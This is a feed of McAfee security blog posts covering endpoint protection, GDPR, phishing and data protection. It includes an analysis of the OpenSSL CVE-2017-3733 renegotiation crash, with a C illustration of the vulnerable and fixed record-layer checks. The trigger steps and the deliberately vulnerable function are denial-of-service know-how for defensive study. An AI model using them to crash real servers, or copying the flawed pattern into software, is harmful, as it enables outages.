Another issue involves the devices users access email on. I don’t want them to install the Outlook client on non-corporate computers. This could be especially risky on public computers, such as in hotel lobbies, because the mail will stay on the device after log-off. We will try to circumvent that risk by requiring that employees use our corporate single sign-on (SSO) solution to log into Outlook. One plus is that our SSO uses multifactor authentication, but it also can be configured to restrict Outlook access to one device (presumably the corporate-issued device). Another way to restrict access is to issue a machine certificate to the corporate PC and configure Office 365 to allow connections only from machines with valid certificates.

Eventually we will deploy a robust third-party mobile device management application to employees who use their phones for business purposes. Until then, we will use the built-in mobile device policies that come with Office 365. These include password requirements, device timeout, encryption, brute-force protection, restrictions against jailbroken devices and the ability to selectively wipe phones (corporate mail only) when a user leaves the company.

We’ll use what Microsoft calls “MailTips” to help with data loss prevention. For instance, if a user creates an email containing sensitive data, such as a credit card number, MailTips will send a warning that that is a bad practice. Similar warnings will be issued when users try to send emails to a distribution list that contains an external user.

We will also prevent users from pulling webmail into Outlook. It’s best to ban that activity outright because we just can’t vouch for the integrity of those personal messages, and we also don’t want to store them on corporate devices.

Finally, we will (of course) enable any and all malware and spam protection. I’ve always said that if my company is going to get hacked, it will most likely result from someone clicking on something in an email. Anything I can do to block malicious emails is well worth the effort. This includes blocking certain email attachments, such as executable files and scripts, that are typically associated with malware. We will also continue to enforce Sender Policy Framework (SPF), which validates the IP address of the email sender.

There are other more advanced configuration options that Microsoft offers that we will evaluate and deploy, so long as they don’t impact our ability to conduct business. The last thing I want is to implement so many restrictions that legitimate email is prevented from reaching its destination. As always in this job, it’s all about finding that balance of security and usability.

This journal is written by a real security manager, “Mathias Thurman,” whose name and employer have been disguised for obvious reasons.


This article was written by Mathias Thurman from Computerworld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The EDR Balancing Act: Impact vs. Ability to Execute
https://securingtomorrow.mcafee.com/business/dynamic-endpoint/edr-balancing-act/
Thu, 11 May 2017 15:00:40 +0000

The post The EDR Balancing Act: Impact vs. Ability to Execute appeared first on McAfee Blogs.

A new breed of advanced malware has its sights on your business. It’s been cleverly crafted to evade standard defenses, burrow into your endpoints, and hide undetected, indefinitely, waiting to spread to other systems. Unfortunately, this is now day-to-day reality for most organizations. The question is what to do about it.

Here’s the way organizations would like to respond: A top security investigator identifies a new malware threat. Using the latest and greatest endpoint detection and response (EDR) tools, she hunts for similar threats in the environment and roots out every other infected system. She learns exactly what the malware did and how, remediates the problem everywhere it exists, and updates defenses to block similar attacks in the future.

Unfortunately, here’s what actually happens: An endpoint administrator encounters an infected machine. He re-images the endpoint and puts the user back online. In the back of his mind, he knows he didn’t actually solve the problem that allowed the infection in the first place. He knows there’s a good chance it’s spread to other endpoints. But the few expert investigators in the organization are already buried in work. And sifting through mountains of data to manually search for the threat would take weeks.

You can see the disconnect. Modern EDR tools can provide amazing defense capabilities. But there just aren’t enough people out there who can use them effectively. According to a 2016 global survey from Intel Security and the Center for Strategic and International Studies, 82 percent of organizations report a shortage of cybersecurity skills. Meanwhile, threats continue to increase.

There’s a way out of this catch-22, but it requires a different way of thinking about EDR. Incident detection and response doesn’t have to be limited to advanced toolsets for specialized experts. By taking advantage of the EDR capabilities integrated into modern endpoint security platforms, you may be able to accomplish a lot more than you realize.

Generally, incident response falls across four categories: detect, contain, investigate, remediate. Modern endpoint platforms can integrate with EDR to provide more visibility and automated capabilities across all those categories, so that front-line administrators can shoulder a lot more of that burden than they used to.

Modern integrated endpoint solutions include:

  • File search: If an administrator can use Google, they should be able to use a basic EDR interface to search for a known malware file. With literally one click, they should be able to see a graphical map of every endpoint where the file resides.
  • Hash search: In the same way, any administrator who can copy and paste a file hash should be able to search for malware they’ve encountered on an endpoint and see, in seconds, everywhere else it’s spread.
  • Automated remediation: When an admin does identify an infection, he’ll want to remove it from every infected endpoint with one click.
  • Automated inoculation: With another click, the administrator could update every other endpoint and security system in the environment to recognize that malware in the future and block it before it executes.

Compare that to the status quo, where each of these activities—correlating a suspected threat, discovering all endpoints it’s infected, removing it, tuning other security solutions (IPS, firewall, web gateways, endpoint agents) to detect it in the future—requires enormous manual effort.

Integrated EDR in Action

How much EDR should happen as part of everyday endpoint operations versus projects spearheaded by specialized experts? There’s no single right answer—it’s about balancing the potential impact of a given activity with your ability to execute. If you’re going to find the right EDR formula for your organization, you need to be honest with yourself about your personnel and investments.

State-of-the-art EDR platforms can provide amazing visibility and incident response capabilities—they can have a huge impact. But the cost to execute is extremely high. Alternatively, endpoint defense platforms with integrated EDR capabilities may not deliver exactly the same impact, but the cost to execute is much lower. With integrated EDR tools and automated workflows, many aspects of investigation and response can be handled by administrators with minimal training.

Integrated EDR may not replicate everything a skilled investigator can do with the most powerful EDR platforms. But if you can accomplish 80 percent of the results with a fraction of the effort, at a fraction of the cost, that’s a pretty good balance of impact and ability to execute.

Get Started

To learn more about finding the right EDR balance for your organization, check out Gartner’s Market Guide for Endpoint Detection and Response Solutions.

“Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS
https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/
Thu, 11 May 2017 14:00:30 +0000

The post “Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS appeared first on McAfee Blogs.

When Philippe Maquoi heard about McAfee Endpoint Security (ENS), he immediately signed up to become one of its first beta testers. “I had been looking for a product like ENS for some time,” he says, “and I had confidence that McAfee was capable of giving me such a product.”

As head of the SPW Endpoint and Server Security team, Philippe Maquoi oversees information security for Service Public de Wallonie (SPW), the public administration arm of the regional government of Wallonia, the French-speaking region of Belgium. Maquoi and his team are responsible for securing the 9,000 desktops, 1,300 servers, and 1,000 major applications used by the government’s more than 8,000 employees.

Maquoi’s team initially migrated 1,000 computers to McAfee ENS version 10.2 and plans to migrate all 9,000 endpoints to ENS version 10.5 imminently. Although Maquoi can’t wait to take full advantage of the Real Protect machine learning and behavioral detection functionality in the most recent version of ENS, he has already seen tremendous benefits from implementing ENS 10.2.

“What I like best about McAfee ENS so far is that it is both stronger and lighter,” says Maquoi. “By that I mean it has superior detection and prevention technology that protects us better against present and future threats, but it is also easier to manage. Both aspects are equally important.”

Better Protection, Time Savings, and More with McAfee ENS

Since SPW initially installed ENS on some but not all nodes, it was easy to compare the impact of the new endpoint security framework with the previous endpoint protection. Take, for instance, when Nemucod ransomware attacked the organization and a handful of users, some on desktops with McAfee ENS and some on desktops without it, clicked on a button embedded in the phishing email. On the desktops not yet migrated to ENS, the user’s action ran a JavaScript downloader that fetched the ransomware, which resulted in two days of work restoring corrupted administrative shares. On the desktops protected by ENS, however, the JavaScript was prevented from executing and users continued working, business as usual.

Maquoi’s team has also seen significant operational time savings compared to dealing with endpoints not yet protected by ENS. For starters, none of his team had to spend time remediating the ENS-protected desktops after the ransomware attack just mentioned. With McAfee ENS, there is less administrative overhead, which also frees up time.

“McAfee ENS is smart enough to stop threats without us having to manually create a bunch of rules, as we had to do in the past,” he states. “Also, instead of having to push out and update multiple agents for various aspects of protection—a HIPS agent, a web content control agent, and so on—booting and rebooting each time, with ENS we have a stronger toolset, encompassed in one product, with just one agent to deal with.”

In addition, for ENS-protected machines, Maquoi says his team no longer has to listen to complaints from angry users on scan day. With malware scanning no longer impacting the performance of those devices, their users are now much happier and more productive.

Furthermore, by migrating to McAfee ENS, SPW is laying the foundation for an adaptable, sustainable threat defense lifecycle. That’s because McAfee ENS is built to communicate using the McAfee Data Exchange Layer (DXL) fabric, which enables near real-time exchange of local and global threat information among diverse security systems via McAfee Threat Intelligence Exchange. Consequently, in the near future when SPW implements McAfee Advanced Threat Defense (ATD) for in-depth sandbox analysis, SPW endpoints will be able to receive threat information directly from ATD and send information directly to ATD, creating even stronger threat detection capabilities and enabling even faster response.

To read the full case study on Service Public de Wallonie, click here. Get your questions answered by tweeting @McAfee.

5 tips for achieving GDPR compliance https://securingtomorrow.mcafee.com/business/safeguard-data/5-tips-for-achieving-gdpr-compliance/ Wed, 10 May 2017 22:50:14 +0000

The post 5 tips for achieving GDPR compliance appeared first on McAfee Blogs.

The European General Data Protection Regulation will have a global impact when it goes into effect on May 25, 2018, according to Gartner Inc. And the firm predicts that by the end of 2018 more than half of companies affected by GDPR will not be in full compliance with its requirements.

“The GDPR will affect not only EU-based organizations, but many data controllers and processors outside the EU as well,” said Bart Willemsen, research director at Gartner. “Threats of hefty fines, as well as the increasingly empowered position of individual data subjects tilt the business case for compliance and should cause decision makers to re-evaluate measures to safely process personal data.”

Gartner recommends that organizations act now to ensure they are compliant when the regulation takes effect. They should focus on five high-priority changes to get up to speed with GDPR requirements:

Determine your role under the GDPR

Any organization that decides on why and how personal data is processed is essentially a “data controller,” Gartner said. So GDPR applies not only to businesses in the European Union but to all organizations outside the EU processing personal data for the offering of goods and services to the EU, or monitoring the behavior of data subjects within the EU.

Appoint a data protection officer

Many organizations are required to appoint a data protection officer, and this is especially important when the organization is a public body, is processing operations requiring regular and systematic monitoring, or has large-scale processing activities, Gartner said.

Demonstrate accountability in all processing activities

Few organizations have identified each process where personal data is involved, the firm said. Going forward, data quality and data relevance should be decided on when starting a new processing activity, it said, as this will help to maintain compliance in future personal data processing activities. Organizations need to demonstrate an accountable posture and transparency in all decisions regarding personal data processing activities.

Check cross-border data flows

Data transfers to any of the 28 EU member states are still allowed, as well as to Norway, Liechtenstein and Iceland, Gartner said. Transfers to any of the other 11 countries the European Commission (EC) deemed to have an “adequate” level of protection are also still possible. Outside of these areas, appropriate safeguards should be used.

Prepare for data subjects exercising their rights

Data subjects have extended rights under the GDPR, Gartner said. These include the right to be forgotten, to data portability and to be informed of data breaches. If a business isn’t prepared to adequately handle data breach incidents and subjects exercising their rights, now is the time to start implementing additional controls, the firm said.

 

This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Don’t Let Cybercriminals Give You the Wedding Bell Blues https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-give-wedding-bell-blues/ Wed, 10 May 2017 13:00:20 +0000

The post Don’t Let Cybercriminals Give You the Wedding Bell Blues appeared first on McAfee Blogs.

It’s springtime, which means flowers are blooming, the sun is shining, and wedding season is starting. Back in my day, weddings were organized by hand, invitations were hand-written, we called and organized registries in person and over the phone. All wedding-planning activities were handled the old-fashioned way. Fast-forward to 2017 and everything, from our relationships to how we communicate with loved ones, has changed thanks to the Internet. So, naturally, the way we plan weddings has changed too. Practically every aspect of planning the big day has gone digital, putting a lot of your — and your guests’ — personal data online.

My daughter, Amber, is the perfect example of how modern wedding planning operates online, and showcases just how much personal data is required to make a wedding a success. When preparing for her special day, Amber and her husband Michael registered on a site called “Wedding Wire.” They used this site to build a wedding database, manage their RSVP list, and look for local vendors. Amber loved the site’s ease of use, especially when it came to managing events from her mobile device, but as a dad, and cybersecurity evangelist, the first thing that came to my mind was how much personal data she was openly sharing with the site – and all those connected to it.

The site streamlines the whole wedding process by organizing venues, vendors, registry, all in one place. But consolidating data online is always a risk. Cybercriminals, who know brides and grooms are willing to put a lot on the line to create their dream wedding, can potentially compromise your personal data – like credit card information, email addresses, home addresses – in one location.

The same thing goes for social media. My daughter used social media heavily throughout her wedding. Not only did she have an Instagram hashtag, but guests frequently shared photos and posts on Facebook. While sharing the wedding day details over social media may seem harmless, it potentially provides cybercriminals with the details they need to launch phishing attacks and more. These attacks could not only target her, but friends, family and other wedding guests who can be lulled into a sense of nostalgia shortly after the big day.

So, when you’re planning your big day, make sure to keep your memories and your information private by following these tips:

-Spread your data out. Amber decided to centralize her planning process by doing everything with one site, which was efficient, but not the most secure. If one vendor gets compromised by a cybercriminal, connected information could be exposed as well. So, make sure your personal information isn’t a one-stop shop for cybercriminals by using a different service for each part of the process.

-Show your password some love. For whatever websites you do use to plan your wedding, make sure you create a strong, unique password when you’re setting up your account. Since you’re sharing personal, and financial information with these sites, it’s crucial to lock your account with a strong and complex password. And if you’re struggling to remember all of your passwords to these sites, use a password manager like the True Key app to secure all of your various accounts.

-Protect your personal data with comprehensive security. Whether you’re sharing your financial information with an online vendor, or using social media to help spread the love, ensure all of your devices are secure with McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

Become a Modern Endpoint Security Master https://securingtomorrow.mcafee.com/business/dynamic-endpoint/become-modern-endpoint-security-master/ Tue, 09 May 2017 23:00:08 +0000

The post Become a Modern Endpoint Security Master appeared first on McAfee Blogs.

A new wave of advanced, targeted malware is seeking out the gaps in conventional endpoint defenses and finding novel ways to exploit them. These attacks use packing, encryption, and polymorphism to mask their true intent, hammering away at your organization with previously unseen “zero-day” attacks that signature-based mechanisms are too slow to catch. They use sophisticated executables that can recognize when they’re being sandbox-analyzed and delay execution. They weaponize legitimate files and applications that appear clean on the surface but have malicious code buried deep within.

It all adds up to a nonstop, overwhelming effort as your endpoint administrators race against the clock to detect, contain, and remediate new malware threats. And if you’re like many organizations, this is a race you’re losing far too often. Too many threats get through. Too many resources are needed to sift through alerts from multiple siloed point solutions and clean up infections. And the time between detection and remediation keeps growing.

There’s an underlying problem here that may sound familiar. When you’re relying on multiple siloed endpoint defense products that can’t talk to each other, you require extra steps and manual effort from your administrators. That takes time and slows your response. Why not try a different approach? Instead of racing around swiveling between half a dozen siloed security tool interfaces, what if your team could use next-generation machine learning techniques to stop most threats before they ever gain a foothold on your endpoints? What if you had a unified, fully integrated, multi-layered defense fabric that could respond to new events and information immediately, without human intervention?

Peel Away the Malware Mask

Next-generation anti-malware capabilities from McAfee can help your organization combat the most evasive modern threats. Drawing on powerful machine learning analysis and application containment tools, your team can unmask hidden threats and stop them in their tracks—much faster with much less effort. These capabilities are delivered through three new innovations:

  • Real Protect Static: Malware authors may be able to change how their code looks, but it’s still malware. So it’s likely to share many attributes with known attacks, such as the compiler used, the shared libraries it references, and many other features. Real Protect Static pre-execution analysis goes beneath the surface, performing an exhaustive machine learning statistical comparison of static binary code features to compare suspicious executables against known threats. It unmasks most malware for what it is in milliseconds, without signatures.
  • Real Protect Dynamic: Even if a sophisticated attack masks its static attributes, it can’t hide how it behaves. Real Protect Dynamic behavioral analysis also provides machine learning statistical analysis, but now comparing the code’s actual behavior against profiles of hundreds of millions of malware samples. The executable is allowed to run while being closely monitored by the endpoint. If it starts behaving maliciously—such as overwriting files or making registry changes that match known malware behavior—the endpoint shuts it down, typically within seconds.
  • Dynamic Application Containment: This new endpoint defense, available only from McAfee, protects against zero-day malware by blocking process actions that malware often uses. Unlike techniques that would hold up the file (and the user) for minutes at a time, Dynamic Application Containment lets the suspicious file load into memory without allowing it to make certain changes to the endpoint or infect other systems while it is under suspicion. The endpoint and user can remain fully productive while providing an opportunity for security teams to perform in-depth analysis.

With these capabilities, your administrators can stop most threats before they can damage an endpoint. They can take on the most sophisticated, evasive malware without needing a team of highly trained security experts. They can fine-tune application containment tools to restrict what can happen on endpoints, and achieve the right balance of security and flexibility for the organization.

Drive Down Complexity, Accelerate Response

Real Protect and Dynamic Application Containment work with each other, as well as the other elements of McAfee Endpoint Security, and with other solutions such as McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense as a single, integrated system. For example, when Real Protect identifies an evasive threat as zero-day malware, it immediately communicates that information to McAfee Threat Intelligence Exchange, which then automatically inoculates the broader environment, in near real time.

The result is a continually evolving threat model for your organization. Each new threat detected enhances the organization’s defenses as a whole. Previously manual steps in the detect, correct, and protect phases of the threat defense lifecycle disappear. And you gain the flexibility to mix and match the industry’s broadest portfolio of threat defense capabilities through a single interface.

Armed with these capabilities, your team can:

  • Unmask the attack: Stop more attacks by stripping away obfuscation techniques to see more malware threats.
  • Limit the impact: Contain, shield, and prevent damage to systems, either before an attack occurs or before it can cause irreversible damage or infection.
  • Track and adapt: Use automated, integrated defenses to perform a wider range of security operations without having to think about them or manually activate them.

Learn More

Join McAfee and Forrester as we discuss more tips on mastering modern endpoint security (each session is available to watch on demand):

  • Americas: May 10, 2:00 PM EDT
  • EMEA: May 10, 3:00 PM BST
  • APAC: May 10, 3:00 PM AEST

Phishing Scams Cost American Businesses Half A Billion Dollars A Year https://securingtomorrow.mcafee.com/business/neutralize-threats/phishing-scams-cost-american-businesses-half-a-billion-dollars-a-year/ Tue, 09 May 2017 21:09:34 +0000

The post Phishing Scams Cost American Businesses Half A Billion Dollars A Year appeared first on McAfee Blogs.

These days, the FBI devotes a lot of time and effort to cybercrimes, particularly those they refer to as business email compromise scams. BECs are a type of phishing attack in which criminals target businesses that frequently send international wire transfers, and they can involve huge sums of money. A report issued this week by the Bureau reveals just how huge.

From October 2013 to December 2016, the FBI investigated just over 22,000 of these incidents involving American businesses, with total losses approaching $1.6 billion. That is roughly $500 million scammed every year, and the dollar figures involved have climbed sharply, up 2,370% between January 2015 and last December.

No business is immune from BECs, it seems. There have been victims in all 50 states, and for the most part no one segment is targeted more frequently than another. Attackers are, however, giving more attention to parties involved in real estate transactions. Lawyers and realtors remained in the crosshairs, but the Internet Crime Complaint Center received almost five times as many reports from title companies last year.

It’s easy enough to see why real estate phishing is on the rise: large sums of money change hands and there are several potential weak links in the transaction process. Compromising any one of those with a successful phish of account details can give an attacker access to a trusted email address from which to launch the second stage of the attack. The fraudster can lie in wait skimming emails for information about a transaction and then send off fraudulent wire instructions to a buyer, seller, or escrow agent when the time is right.

The closing section of the FBI bulletin offers several tips for avoiding BECs, and they’re worth studying whether or not you own or operate a business. Among them: being more cautious when requests are urgent or secrecy is requested, closely scrutinizing any communications (sender’s email address, writing style, etc.) involving financial details, and implementing two-factor authentication to minimize the potential for account breaches.

 

This article was written by Lee Mathews from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness https://securingtomorrow.mcafee.com/business/optimize-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/ Tue, 09 May 2017 19:39:40 +0000

The post Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness appeared first on McAfee Blogs.

Time was, automation was a dirty word in security. Now, it is a necessity. A new Enterprise Strategy Group (ESG) survey, sponsored by McAfee and other technology vendors, shows that 3 out of 5 organizations see manual processes as holding them back from better organizational effectiveness when it comes to security analytics and operations. My rule of thumb is: The third time you do the same thing, automate it. That doesn’t mean automating actions like wiping a system or rebooting, but it does mean you get the machines to do the easy work. Automation can mean setting a policy, defining an alarm or quarantine based on a trigger, defining a correlation rule to make the same review decision you had been doing and then setting an alarm or creating a watchlist, or using a script to package and forward data. Any of these approaches is easily implemented with today’s technology.

A case in point – the findings also show that the #1 priority for automation and/or orchestration is integrating external threat intelligence with internal security data collection and analysis. That capability is entirely automated today with the McAfee Enterprise Security Manager. You can consume IOCs and mine your database to see if they are already present in your environment, generating alarms for any matches, and also set a watch in case these IOCs enter your infrastructure in the future. The watchlist can also trigger an action you define – from a simple alarm to active quarantine. Check out this video to see for yourself.

ESG Research, Cybersecurity Analytics and Operations Survey, April 2017.

Vulnerable OpenSSL Handshake Renegotiation Can Trigger Denial of Service https://securingtomorrow.mcafee.com/mcafee-labs/vulnerable-openssl-handshake-renegotiation-can-trigger-denial-service/ Tue, 09 May 2017 18:54:01 +0000

The post Vulnerable OpenSSL Handshake Renegotiation Can Trigger Denial of Service appeared first on McAfee Blogs.

OpenSSL, the popular general-purpose cryptographic library that implements the SSL/TLS protocols used to secure web traffic, has recently suffered from several vulnerabilities. We have written about “CVE-2017-3731: Truncated Packets Can Cause Denial of Service in OpenSSL” and “SSL Death Alert (CVE-2016-8610) Can Cause Denial of Service to OpenSSL Servers” among others. Today we examine the high-severity bug CVE-2017-3733, the Encrypt-then-MAC renegotiation crash that can cause a denial of service.

Before SSL/TLS encrypts application data, it runs the Handshake and ChangeCipherSpec protocols.

During the Handshake phase, the client and server agree on which cipher suite (key exchange, encryption and MAC algorithms) to use. Once the negotiation is done, each side sends a ChangeCipherSpec message, after which its traffic is protected with the negotiated algorithms.

Encrypted data is combined with its message authentication code (MAC) in one of two ways in SSL/TLS.

  1. MAC-then-encrypt: This method calculates the MAC over the plaintext, appends it to the plaintext, and runs the encryption algorithm over the result. This is the original SSL/TLS record construction.
  2. Encrypt-then-MAC: The plaintext is encrypted first, and a MAC computed over the ciphertext is appended to it. This construction is negotiated through the Encrypt-then-MAC extension (RFC 7366).

If the ClientHello message does not carry the Encrypt-then-MAC extension, the connection uses the default MAC-then-encrypt construction. If the client offers the extension and the server accepts it in its ServerHello, both sides compute the MAC after encrypting the data.

If the client or server wishes to change the negotiated parameters, either side can renegotiate the cipher suite they have already agreed on. This can happen at any time during data transfer by starting a new Handshake, which runs over the existing, already encrypted SSL/TLS connection.

Triggering the vulnerability

OpenSSL offers this explanation:

“During a renegotiation handshake if the Encrypt-Then-Mac extension is negotiated where it was not in the original handshake (or vice-versa) then this can cause OpenSSL to crash (dependent on ciphersuite). Both clients and servers are affected.”

Say the client starts a TLS handshake with the server in the default MAC-then-encrypt mode. If the client later renegotiates with the Encrypt-then-MAC extension and sends application data in Encrypt-then-MAC form before the ChangeCipherSpec message of that renegotiation, the server crashes, causing a denial of service.

When the client triggers this vulnerability, the server crashes in the ssl3_get_record function in ssl3_record.c.

The crash occurs at line 352, in an assertion that mac_size is at most EVP_MAX_MD_SIZE (64 bytes).

The if statement preceding the assertion checks whether the Encrypt-then-MAC flag is set on the server; the macro in the if condition tests that flag.

The flag TLS1_FLAGS_ENCRYPT_THEN_MAC is already set when the ClientHello carrying the Encrypt-then-MAC extension arrives during renegotiation, so control enters the if block. But because the ChangeCipherSpec message has not yet reached the server, the server’s read state is still the one negotiated for MAC-then-encrypt: it does not yet know it must use Encrypt-then-MAC.

Putting a breakpoint at line 352 and inspecting the mac_size variable shows the value 0xffffffff, which is greater than EVP_MAX_MD_SIZE (64). The assertion therefore fails and the server aborts.

How does mac_size end up as 0xffffffff? It is computed by EVP_MD_CTX_size, which returns the digest size of the context passed to it.

EVP_MD_CTX_size returns -1 when the context holds no message digest. Stored into the unsigned mac_size, -1 becomes its 32-bit two’s-complement representation, 0xffffffff. In other words, the digest in s->read_hash is null: the server is still using the read state set up for MAC-then-encrypt, and for the cipher suites that trigger the crash that state’s MAC context has no digest attached (which is why OpenSSL notes the crash depends on the cipher suite), yet the Encrypt-then-MAC flag already tells the record layer to look up a MAC length.
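To make the arithmetic behind the crash concrete, here is an added illustration in C. It is not OpenSSL source: md_ctx, ssl_state, FLAG_ENCRYPT_THEN_MAC, md_ctx_size() and the two *_get_record() functions are simplified stand-ins for EVP_MD_CTX, the SSL object, TLS1_FLAGS_ENCRYPT_THEN_MAC, EVP_MD_CTX_size() and ssl3_get_record(). It reproduces the pre-fix pattern (an int return stored into an unsigned mac_size and then range-asserted) beside a hardened variant that keeps the signed result and rejects a negative size with a protocol error instead of an assertion; the hardened variant is my illustration of the needed check, not OpenSSL’s patch quoted verbatim. It assumes a 32-bit unsigned int, as the 0xffffffff value above does.

```c
#include <stdio.h>

/*
 * Added illustration of the CVE-2017-3733 arithmetic. This is NOT OpenSSL
 * source: md_ctx, ssl_state, FLAG_ENCRYPT_THEN_MAC, md_ctx_size() and the two
 * *_get_record() functions are simplified stand-ins for EVP_MD_CTX, the SSL
 * object, TLS1_FLAGS_ENCRYPT_THEN_MAC, EVP_MD_CTX_size() and ssl3_get_record().
 * Assumes a 32-bit unsigned int, as the 0xffffffff value in the post does.
 */

#define EVP_MAX_MD_SIZE        64    /* same limit OpenSSL asserts against */
#define FLAG_ENCRYPT_THEN_MAC  0x1u  /* stand-in for TLS1_FLAGS_ENCRYPT_THEN_MAC */

/* Stand-in for an EVP_MD_CTX: digest_size is 0 when no digest is attached. */
typedef struct {
    int digest_size;                 /* 32 for SHA-256, 20 for SHA-1, 0 = none */
} md_ctx;

/* The parts of the SSL object that the record layer consults. */
typedef struct {
    unsigned long flags;             /* ETM flag is set as soon as the extension is seen */
    md_ctx *read_hash;               /* MAC context of the *current* read state */
} ssl_state;

typedef enum {
    RECORD_OK = 0,                   /* record accepted for MAC checking */
    RECORD_WOULD_ABORT = 1,          /* OPENSSL_assert() would fire: process dies */
    RECORD_REJECTED = 2              /* hardened path: fatal alert, process survives */
} record_result;

/* Mirrors EVP_MD_CTX_size(): returns -1 when the context has no digest. */
static int md_ctx_size(const md_ctx *ctx)
{
    if (ctx == NULL || ctx->digest_size == 0)
        return -1;
    return ctx->digest_size;
}

/*
 * Pre-fix pattern. The signed return value is stored in an unsigned variable,
 * so -1 becomes 0xffffffff; the "<= EVP_MAX_MD_SIZE" assertion then fails.
 */
record_result vulnerable_get_record(const ssl_state *s, unsigned int *mac_size_out)
{
    unsigned int mac_size = 0;

    if (s->flags & FLAG_ENCRYPT_THEN_MAC) {
        mac_size = (unsigned int)md_ctx_size(s->read_hash);   /* -1 wraps here */
        *mac_size_out = mac_size;
        if (!(mac_size <= EVP_MAX_MD_SIZE))                   /* OPENSSL_assert */
            return RECORD_WOULD_ABORT;
    } else {
        *mac_size_out = mac_size;
    }
    return RECORD_OK;
}

/*
 * Hardened pattern (an illustration of the needed check, not OpenSSL's patch
 * quoted verbatim): keep the signed result, and turn a negative or oversized
 * MAC length into a protocol error instead of an assertion.
 */
record_result fixed_get_record(const ssl_state *s, unsigned int *mac_size_out)
{
    *mac_size_out = 0;

    if (s->flags & FLAG_ENCRYPT_THEN_MAC) {
        int imac_size = md_ctx_size(s->read_hash);
        if (imac_size < 0 || imac_size > EVP_MAX_MD_SIZE)
            return RECORD_REJECTED;          /* would send an internal_error alert */
        *mac_size_out = (unsigned int)imac_size;
    }
    return RECORD_OK;
}

int main(void)
{
    /* The renegotiation ClientHello carried the ETM extension (flag set), but
     * no ChangeCipherSpec has arrived, so read_hash is still the old read
     * state, whose MAC context carries no digest. */
    md_ctx no_digest = { 0 };
    ssl_state renegotiating = { FLAG_ENCRYPT_THEN_MAC, &no_digest };
    unsigned int mac_size = 0;
    record_result r;

    r = vulnerable_get_record(&renegotiating, &mac_size);
    printf("vulnerable: mac_size=0x%08x result=%d\n", mac_size, (int)r);

    r = fixed_get_record(&renegotiating, &mac_size);
    printf("fixed:      mac_size=0x%08x result=%d\n", mac_size, (int)r);
    return 0;
}
```

Compile with `cc -std=c99`: the vulnerable path reports mac_size 0xffffffff and the would-abort result, the hardened path reports a rejection and leaves the process alive. Note that the length check only removes the crash; the underlying problem is that the Encrypt-then-MAC flag changes before the ChangeCipherSpec that switches the read state, and a complete fix has to keep the two in step.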

Users of McAfee products are protected from this attack by signature 0x45c09700. The bug affects the OpenSSL 1.1.0 branch and was fixed in 1.1.0e; the 1.0.2 branch is not affected. All administrators running 1.1.0 should update OpenSSL to the latest version.

Thanks to Hardik Shah for helping me with this post.

Pervasive Data Protection: Kick the Quick-Fix Habit and Go for a Unified Defense https://securingtomorrow.mcafee.com/business/safeguard-data/pervasive-data-protection-kick-quick-fix-habit-go-unified-defense/ Tue, 09 May 2017 15:00:13 +0000

The post Pervasive Data Protection: Kick the Quick-Fix Habit and Go for a Unified Defense appeared first on McAfee Blogs.

The cloud is here to stay—and no one in the enterprise playing field would argue that point. Cloud adoption across nearly every business unit is a reality that CISOs have fully accepted. Now the big uphill battle for security professionals is how to gain visibility into and protect the vast quantity of vital data that flows in, through, and beyond the four walls of their organizations—to and from endpoints, through the network, and into the cloud and back. The question becomes: How do you ensure that data is secured across a controlled environment (the corporate network), where you have a pretty high level of visibility, and an uncontrolled environment (the cloud), where you have little or no visibility at all?

When Silver Bullets Misfire

When we look at how most IT organizations are addressing the four essential ingredients of data protection—data loss prevention (DLP), encryption, web technologies, and the latest security buzzword, cloud access security brokers (CASBs)—it probably comes as no surprise that they typically depend on one or two vendors for each area. In an effort to cover all the bases, organizations resort to the silver bullet approach. They purchase the hottest new thing in data security and bolt it onto their infrastructure in hopes that this collection of solutions will do the job.

Though the best-of-breed path may work in the short term, it has its shortfalls and actually creates even more problems:

  • When you add more and more products, you’ll eventually have a huge—and costly—management burden. With the current scarcity of specialized security talent, will you be able to find the resources with the right skill set to manage these products? And even if you do, the cost of staffing up will mount quickly.
  • Unintegrated products from multiple vendors can’t communicate with one another, so visibility and threat intelligence sharing is limited or non-existent. Sure, you can engage consultants to brute-force integrations, but that’s an expensive proposition.
  • Policy modification and management becomes inconsistent and unwieldy. Some CASB solutions, for example, do a great job of analyzing data about security events gleaned from log files (which may live on a separate server) pushed out from web gateways. But they often have no way of sharing the information they’ve gleaned. Typically, they lack the ability to automatically go back and modify web access policies to define what data can be shared, who can share it, and where it can be shared.

A Simpler Solution

Most organizations have had little choice but to go down this path, as they’ve had few viable alternatives. But, as we’ve seen, silver bullet solutions are only a temporary fix.

The best way to overcome the issues we’ve mentioned is an open framework that allows technologies to communicate with one another and unified single pane-of-glass management capabilities that allow for complete visibility—from the internal network to the cloud and back.

In the near future, you’ll see new advancements in more automated pervasive data protection through a unified architecture that brings together the four pillars of data protection across endpoints, the network, the cloud, and mobile. There are two key components of this simplified approach to pervasive data protection:

Centralized management:

  • Instead of disparate, non-compatible management consoles for web gateways, CASB, encryption, and DLP, centralized management unifies all data security technologies using a common platform, a common user interface, and common policies. You can synchronize data control policies in the cloud with those on premises for increased consistency. And, you actually need fewer policies. You can easily apply these to the network, endpoints, and the cloud—all from a single console. Maintenance is also easier. One administrator can do it all, so there’s no need to invest in additional staff.

Threat intelligence sharing:

  • This model also includes a communications fabric that enables information sharing with your endpoint protection suite, endpoint DLP, encryption, and cloud data protection for faster and more accurate detection, protection, and correction.

It will become obvious soon enough that a best-of-breed approach to data protection is more tactical than strategic: it is only a stopgap measure. Security professionals can take heart now that they know there’s another choice on the horizon that provides them with greater visibility, ease of management, and simplified policy creation. Are you ready to take the leap?

